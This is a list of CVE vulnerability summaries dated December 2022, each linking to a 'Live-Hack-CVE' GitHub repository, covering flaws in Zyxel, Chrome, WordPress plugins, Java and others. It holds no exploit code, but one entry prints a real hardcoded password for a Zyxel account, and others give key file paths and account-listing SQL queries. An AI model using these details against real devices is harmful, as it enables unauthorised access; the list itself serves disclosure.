**Affected devices do not properly sanitize data introduced by an user when rendering the web interface. This could allow an authenticated remote attacker with administrative privileges to inject code and lead to a DOM-based XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36325](https://github.com/Live-Hack-CVE/CVE-2022-36325) create time: 2022-12-28T19:53:19Z

**Nessus Agent versions 7.2.0 through 8.2.2 were found to inadvertently capture the IAM role security token on the local host during initial linking of the Nessus Agent when installed on an Amazon EC2 instance. This could allow a privileged attacker to obtain the token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20077](https://github.com/Live-Hack-CVE/CVE-2021-20077) create time: 2022-12-28T18:25:59Z

**The SOAP parser in PHP before 5.3.22 and 5.4.x before 5.4.12 allows remote attackers to read arbitrary files via a SOAP WSDL file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue in the soap_xmlParseFile and soap_xmlParseMemory function CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1824](https://github.com/Live-Hack-CVE/CVE-2013-1824) create time: 2022-12-28T18:34:39Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.71 and earlier, 5.5.33 and earlier, and 5.6.13 and earlier allows remote authenticated users to affect integrity via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0393](https://github.com/Live-Hack-CVE/CVE-2014-0393) create time: 2022-12-28T19:10:46Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4792. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4802](https://github.com/Live-Hack-CVE/CVE-2015-4802) create time: 2022-12-28T19:09:44Z

**Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1285](https://github.com/Live-Hack-CVE/CVE-2018-1285) create time: 2022-12-28T18:35:24Z

**GDAL through 3.0.1 has a poolDestroy double free in OGRExpatRealloc in ogr/ogr_expat.cpp when the 10MB threshold is exceeded. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17545](https://github.com/Live-Hack-CVE/CVE-2019-17545) create time: 2022-12-28T19:15:15Z

**Type confusion in xsltNumberFormatGetMultipleLevel prior to libxslt 1.1.33 could allow attackers to potentially exploit heap corruption via crafted XML data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5815](https://github.com/Live-Hack-CVE/CVE-2019-5815) create time: 2022-12-28T18:35:57Z

**nfs_lookup_reply in net/nfs.c in Das U-Boot through 2022.04 (and through 2022.07-rc2) has an unbounded memcpy with a failed length check, leading to a buffer overflow. NOTE: this issue exists because of an incorrect fix for CVE-2019-14196. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30767](https://github.com/Live-Hack-CVE/CVE-2022-30767) create time: 2022-12-28T18:35:27Z

**In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17498](https://github.com/Live-Hack-CVE/CVE-2019-17498) create time: 2022-12-28T18:34:09Z

**It has been reported that XSS is possible in Forcepoint Email Security, versions 8.5 and 8.5.3. It is strongly recommended that you apply the relevant hotfix in order to remediate this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6142](https://github.com/Live-Hack-CVE/CVE-2019-6142) create time: 2022-12-28T18:34:01Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has the q6xV4aW8bQ4cfD-b password for the axiros account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15347](https://github.com/Live-Hack-CVE/CVE-2020-15347) create time: 2022-12-28T19:15:04Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_get_instances_for_update API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15345](https://github.com/Live-Hack-CVE/CVE-2020-15345) create time: 2022-12-28T19:15:00Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a /live/GLOBALS API with the CLOUDCNM key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15346](https://github.com/Live-Hack-CVE/CVE-2020-15346) create time: 2022-12-28T19:14:56Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a "Use of GET Request Method With Sensitive Query Strings" issue for /cnr requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15338](https://github.com/Live-Hack-CVE/CVE-2020-15338) create time: 2022-12-28T19:14:53Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_install_user_key API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15343](https://github.com/Live-Hack-CVE/CVE-2020-15343) create time: 2022-12-28T19:14:46Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_install_user API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15342](https://github.com/Live-Hack-CVE/CVE-2020-15342) create time: 2022-12-28T19:14:43Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows live/CPEManager/AXCampaignManager/handle_campaign_script_link?script_name= XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15339](https://github.com/Live-Hack-CVE/CVE-2020-15339) create time: 2022-12-28T19:14:39Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded opt/axess/AXAssets/default_axess/axess/TR69/Handlers/turbolink/sshkeys/id_rsa SSH key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15340](https://github.com/Live-Hack-CVE/CVE-2020-15340) create time: 2022-12-28T19:14:35Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated zy_get_user_id_and_key API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15344](https://github.com/Live-Hack-CVE/CVE-2020-15344) create time: 2022-12-28T19:14:32Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded APP_KEY in /opt/axess/etc/default/axess. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15330](https://github.com/Live-Hack-CVE/CVE-2020-15330) create time: 2022-12-28T19:14:17Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a "Use of GET Request Method With Sensitive Query Strings" issue for /registerCpe requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15337](https://github.com/Live-Hack-CVE/CVE-2020-15337) create time: 2022-12-28T19:14:10Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows attackers to discover accounts via MySQL "select * from Administrator_users" and "select * from Users_users" requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15333](https://github.com/Live-Hack-CVE/CVE-2020-15333) create time: 2022-12-28T19:14:06Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 allows escape-sequence injection into the /var/log/axxmpp.log file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15334](https://github.com/Live-Hack-CVE/CVE-2020-15334) create time: 2022-12-28T19:14:03Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has weak /opt/axess/etc/default/axess permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15332](https://github.com/Live-Hack-CVE/CVE-2020-15332) create time: 2022-12-28T19:13:58Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded OAUTH_SECRET_KEY in /opt/axess/etc/default/axess. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15331](https://github.com/Live-Hack-CVE/CVE-2020-15331) create time: 2022-12-28T19:13:54Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 uses ZODB storage without authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15327](https://github.com/Live-Hack-CVE/CVE-2020-15327) create time: 2022-12-28T19:13:46Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded Erlang cookie for ejabberd replication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15325](https://github.com/Live-Hack-CVE/CVE-2020-15325) create time: 2022-12-28T19:13:42Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has weak /opt/axess/var/blobstorage/ permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15328](https://github.com/Live-Hack-CVE/CVE-2020-15328) create time: 2022-12-28T19:13:25Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded certificate for Ejabberd in ejabberd.pem. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15326](https://github.com/Live-Hack-CVE/CVE-2020-15326) create time: 2022-12-28T19:13:21Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has weak Data.fs permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15329](https://github.com/Live-Hack-CVE/CVE-2020-15329) create time: 2022-12-28T19:13:17Z

**The parseXML function in Easy-XML 0.5.0 was discovered to have a XML External Entity (XXE) vulnerability which allows for an attacker to expose sensitive data or perform a denial of service (DOS) via a crafted external entity entered into the XML content as input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26705](https://github.com/Live-Hack-CVE/CVE-2020-26705) create time: 2022-12-28T19:13:10Z

**An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2038](https://github.com/Live-Hack-CVE/CVE-2020-2038) create time: 2022-12-28T19:12:06Z

**A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The revocation feature was not revoking all session tokens and one could re-use it to obtain a valid session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13299](https://github.com/Live-Hack-CVE/CVE-2020-13299) create time: 2022-12-28T19:12:03Z

**A SQL injection vulnerability in TopicMapper.xml of PybbsCMS v5.2.1 allows attackers to access sensitive database information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28702](https://github.com/Live-Hack-CVE/CVE-2020-28702) create time: 2022-12-28T19:09:51Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14593](https://github.com/Live-Hack-CVE/CVE-2020-14593) create time: 2022-12-28T18:32:16Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromis CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14621](https://github.com/Live-Hack-CVE/CVE-2020-14621) create time: 2022-12-28T18:32:13Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14579](https://github.com/Live-Hack-CVE/CVE-2020-14579) create time: 2022-12-28T18:32:09Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14581](https://github.com/Live-Hack-CVE/CVE-2020-14581) create time: 2022-12-28T18:32:05Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14578](https://github.com/Live-Hack-CVE/CVE-2020-14578) create time: 2022-12-28T18:32:02Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14583](https://github.com/Live-Hack-CVE/CVE-2020-14583) create time: 2022-12-28T18:31:56Z

**There is a permission control vulnerability in the Nearby module.Successful exploitation of this vulnerability will affect availability and integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40053](https://github.com/Live-Hack-CVE/CVE-2021-40053) create time: 2022-12-28T19:11:19Z

**twmap v2.91_v4.33 is affected by a Cross Site Scripting (XSS) vulnerability. In file list.php, the exit function will terminate the script and print the message to the user. The message will contain $_REQUEST then there is a XSS vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43696](https://github.com/Live-Hack-CVE/CVE-2021-43696) create time: 2022-12-28T19:10:53Z

**youtube-php-mirroring (last update Jun 9, 2017) is affected by a Cross Site Scripting (XSS) vulnerability in file ytproxy/index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43692](https://github.com/Live-Hack-CVE/CVE-2021-43692) create time: 2022-12-28T19:10:49Z

**An issue was discovered in the eGeeTouch 3rd Generation Travel Padlock application for Android. The lock sends a pairing code before each operation (lock or unlock) activated via the companion app. The code is sent unencrypted, allowing any attacker with the same app (either Android or iOS) to add the lock and take com CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44518](https://github.com/Live-Hack-CVE/CVE-2021-44518) create time: 2022-12-28T19:10:02Z

**Vulnerability of writing data to an arbitrary address in the HW_KEYMASTER module. Successful exploitation of this vulnerability may affect confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40040](https://github.com/Live-Hack-CVE/CVE-2021-40040) create time: 2022-12-28T19:09:58Z

**Nodebb is an open source Node.js based forum software. In affected versions incorrect logic present in the token verification step unintentionally allowed master token access to the API. The vulnerability has been patch as of v1.18.5. Users are advised to upgrade as soon as possible. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43786](https://github.com/Live-Hack-CVE/CVE-2021-43786) create time: 2022-12-28T19:09:40Z

**The Error Log Viewer WordPress plugin before 1.1.2 does not perform nonce check when deleting a log file and does not have path traversal prevention, which could allow attackers to make a logged in admin delete arbitrary text files on the web server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24761](https://github.com/Live-Hack-CVE/CVE-2021-24761) create time: 2022-12-28T18:37:48Z

**The Path Sanity Check script of FreeCAD 0.19 is vulnerable to OS command injection, allowing an attacker to execute arbitrary commands via a crafted FCStd document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45845](https://github.com/Live-Hack-CVE/CVE-2021-45845) create time: 2022-12-28T18:37:40Z

**Improper sanitization in the invocation of ODA File Converter from FreeCAD 0.19 allows an attacker to inject OS commands via a crafted filename. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45844](https://github.com/Live-Hack-CVE/CVE-2021-45844) create time: 2022-12-28T18:37:37Z

**Nodebb is an open source Node.js based forum software. Prior to v1.18.5, a path traversal vulnerability was present that allowed users to access JSON files outside of the expected `languages/` directory. The vulnerability has been patched as of v1.18.5. Users are advised to upgrade as soon as possible. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43788](https://github.com/Live-Hack-CVE/CVE-2021-43788) create time: 2022-12-28T18:37:33Z

**Nodebb is an open source Node.js based forum software. In affected versions a prototype pollution vulnerability in the uploader module allowed a malicious user to inject arbitrary data (i.e. javascript) into the DOM, theoretically allowing for an account takeover when used in conjunction with a path traversal vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43787](https://github.com/Live-Hack-CVE/CVE-2021-43787) create time: 2022-12-28T18:36:01Z

**Use after free in Blink XSLT in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30560](https://github.com/Live-Hack-CVE/CVE-2021-30560) create time: 2022-12-28T18:35:20Z

**The Yoast SEO WordPress plugin (from versions 16.7 until 17.2) discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25118](https://github.com/Live-Hack-CVE/CVE-2021-25118) create time: 2022-12-28T18:35:16Z

**The Tipsacarrier WordPress plugin before 1.5.0.5 does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25002](https://github.com/Live-Hack-CVE/CVE-2021-25002) create time: 2022-12-28T18:35:12Z

**Xpdf prior to version 4.04 contains an integer overflow in the JBIG2 decoder (JBIG2Stream::readTextRegionSeg() in JBIG2Stream.cc). Processing a specially crafted PDF file or JBIG2 image could lead to a crash or the execution of arbitrary code. This is similar to the vulnerability described by CVE-2021-30860 (Apple Core CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38171](https://github.com/Live-Hack-CVE/CVE-2022-38171) create time: 2022-12-28T18:35:05Z

**JSDom improperly allows the loading of local resources, which allows for local files to be manipulated by a malicious web page when script execution is enabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20066](https://github.com/Live-Hack-CVE/CVE-2021-20066) create time: 2022-12-28T18:33:57Z

**The Arm Mali GPU kernel driver allows privilege escalation or a denial of service (memory corruption) because an unprivileged user can achieve read/write access to read-only pages. This affects Bifrost r0p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r8p0 through r30p0 before r31p0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28664](https://github.com/Live-Hack-CVE/CVE-2021-28664) create time: 2022-12-28T18:33:54Z

**A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36260](https://github.com/Live-Hack-CVE/CVE-2021-36260) create time: 2022-12-28T18:33:50Z

**Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29447](https://github.com/Live-Hack-CVE/CVE-2021-29447) create time: 2022-12-28T18:30:49Z

**HarfBuzz 2.9.0 has an out-of-bounds write in hb_bit_set_invertible_t::set (called from hb_sparseset_t<hb_bit_set_invertible_t>::set and hb_set_copy). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45931](https://github.com/Live-Hack-CVE/CVE-2021-45931) create time: 2022-12-28T18:28:07Z

**rxvt-unicode 9.22, rxvt 2.7.10, mrxvt 0.5.4, and Eterm 0.9.7 allow (potentially remote) code execution because of improper handling of certain escape sequences (ESC G Q). A response is terminated by a newline. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33477](https://github.com/Live-Hack-CVE/CVE-2021-33477) create time: 2022-12-28T18:28:04Z

**report_vbuild in report.c in Fetchmail before 6.4.20 sometimes omits initialization of the vsnprintf va_list argument, which might allow mail servers to cause a denial of service or possibly have unspecified other impact via long error messages. NOTE: it is unclear whether use of Fetchmail on any realistic platform res CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36386](https://github.com/Live-Hack-CVE/CVE-2021-36386) create time: 2022-12-28T18:27:41Z

**Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39272](https://github.com/Live-Hack-CVE/CVE-2021-39272) create time: 2022-12-28T18:27:35Z

**A flaw in grub2 was found where its configuration file, known as grub.cfg, is being created with the wrong permission set allowing non privileged users to read its content. This represents a low severity confidentiality issue, as those users can eventually read any encrypted passwords present in grub.cfg. This flaw aff CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3981](https://github.com/Live-Hack-CVE/CVE-2021-3981) create time: 2022-12-28T18:27:31Z

**The Cookie Bar WordPress plugin before 1.8.9 doesn't properly sanitise the Cookie Bar Message setting, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24653](https://github.com/Live-Hack-CVE/CVE-2021-24653) create time: 2022-12-28T18:27:27Z

**Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34798](https://github.com/Live-Hack-CVE/CVE-2021-34798) create time: 2022-12-28T18:27:02Z

**In Wi-Fi, there is a possible leak of location-sensitive data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-176541017 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0518](https://github.com/Live-Hack-CVE/CVE-2021-0518) create time: 2022-12-28T18:26:54Z

**xen/arm: No memory limit for dom0less domUs The dom0less feature allows an administrator to create multiple unprivileged domains directly from Xen. Unfortunately, the memory limit from them is not set. This allow a domain to allocate memory beyond what an administrator originally configured. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28700](https://github.com/Live-Hack-CVE/CVE-2021-28700) create time: 2022-12-28T18:26:50Z

**Loading specially-crafted yaml with the Kubernetes Java Client library can lead to code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25738](https://github.com/Live-Hack-CVE/CVE-2021-25738) create time: 2022-12-28T18:26:42Z

**While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41524](https://github.com/Live-Hack-CVE/CVE-2021-41524) create time: 2022-12-28T18:26:39Z

**Intent redirection vulnerability using implicit intent in Samsung email prior to version 6.1.70.20 allows attacker to get sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36837](https://github.com/Live-Hack-CVE/CVE-2022-36837) create time: 2022-12-28T19:14:14Z

**Implicit Intent hijacking vulnerability in Galaxy Wearable prior to version 2.2.50 allows attacker to get sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36838](https://github.com/Live-Hack-CVE/CVE-2022-36838) create time: 2022-12-28T19:13:50Z

**SQL injection vulnerability via IAPService in Samsung Checkout prior to version 5.0.53.1 allows attackers to access IAP information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36839](https://github.com/Live-Hack-CVE/CVE-2022-36839) create time: 2022-12-28T19:13:13Z

**A denial of service vulnerability exists in the libxm_av.so DemuxCmdInBuffer functionality of Anker Eufy Homebase 2 2.1.8.5h. A specially-crafted set of network packets can lead to a device reboot. An attacker can send packets to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26073](https://github.com/Live-Hack-CVE/CVE-2022-26073) create time: 2022-12-28T19:13:06Z

**DLL hijacking vulnerability in Samsung Update Setup prior to version 2.2.9.50 allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36840](https://github.com/Live-Hack-CVE/CVE-2022-36840) create time: 2022-12-28T19:13:02Z

**The Duplicator WordPress plugin before 1.4.7.1 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2552](https://github.com/Live-Hack-CVE/CVE-2022-2552) create time: 2022-12-28T19:12:58Z

**cfg_tilde_expand in confuse.c in libConfuse 3.3 has a heap-based buffer over-read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40320](https://github.com/Live-Hack-CVE/CVE-2022-40320) create time: 2022-12-28T19:12:54Z

**Double free in WebGL in Google Chrome prior to 102.0.5005.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2008](https://github.com/Live-Hack-CVE/CVE-2022-2008) create time: 2022-12-28T19:12:50Z

**Use after free in Nearby Share in Google Chrome on Chrome OS prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via specific UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2609](https://github.com/Live-Hack-CVE/CVE-2022-2609) create time: 2022-12-28T19:12:45Z

**Use after free in Overview Mode in Google Chrome on Chrome OS prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via specific UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2608](https://github.com/Live-Hack-CVE/CVE-2022-2608) create time: 2022-12-28T19:12:40Z

**Side-channel information leakage in Keyboard input in Google Chrome prior to 104.0.5112.79 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2612](https://github.com/Live-Hack-CVE/CVE-2022-2612) create time: 2022-12-28T19:12:36Z

**Inappropriate implementation in Fullscreen API in Google Chrome on Android prior to 104.0.5112.79 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2611](https://github.com/Live-Hack-CVE/CVE-2022-2611) create time: 2022-12-28T19:12:19Z

**Insufficient policy enforcement in Background Fetch in Google Chrome prior to 104.0.5112.79 allowed a remote attacker to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2610](https://github.com/Live-Hack-CVE/CVE-2022-2610) create time: 2022-12-28T19:12:15Z

**An authentication bypass vulnerability exists in the libxm_av.so getpeermac() functionality of Anker Eufy Homebase 2 2.1.8.5h. A specially-crafted DHCP packet can lead to authentication bypass. An attacker can DHCP poison to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25989](https://github.com/Live-Hack-CVE/CVE-2022-25989) create time: 2022-12-28T19:12:12Z

**Use after free in Safe Browsing in Google Chrome prior to 104.0.5112.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2604](https://github.com/Live-Hack-CVE/CVE-2022-2604) create time: 2022-12-28T19:11:59Z

**Use after free in Omnibox in Google Chrome prior to 104.0.5112.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2603](https://github.com/Live-Hack-CVE/CVE-2022-2603) create time: 2022-12-28T19:11:55Z

**Use after free in Tab Strip in Google Chrome on Chrome OS prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via specific UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2607](https://github.com/Live-Hack-CVE/CVE-2022-2607) create time: 2022-12-28T19:11:50Z

**Use after free in Managed devices API in Google Chrome prior to 104.0.5112.79 allowed a remote attacker who convinced a user to enable a specific Enterprise policy to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2606](https://github.com/Live-Hack-CVE/CVE-2022-2606) create time: 2022-12-28T19:11:46Z

**Out of bounds read in Dawn in Google Chrome prior to 104.0.5112.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2605](https://github.com/Live-Hack-CVE/CVE-2022-2605) create time: 2022-12-28T19:11:40Z

**Permission control vulnerability in the network module. Successful exploitation of this vulnerability may affect service availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37006](https://github.com/Live-Hack-CVE/CVE-2022-37006) create time: 2022-12-28T19:11:37Z

**An issue was discovered in Joomla! 4.2.0 through 4.2.3. Inadequate filtering of potentially malicious user input leads to reflected XSS vulnerabilities in various components. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27913](https://github.com/Live-Hack-CVE/CVE-2022-27913) create time: 2022-12-28T19:11:15Z

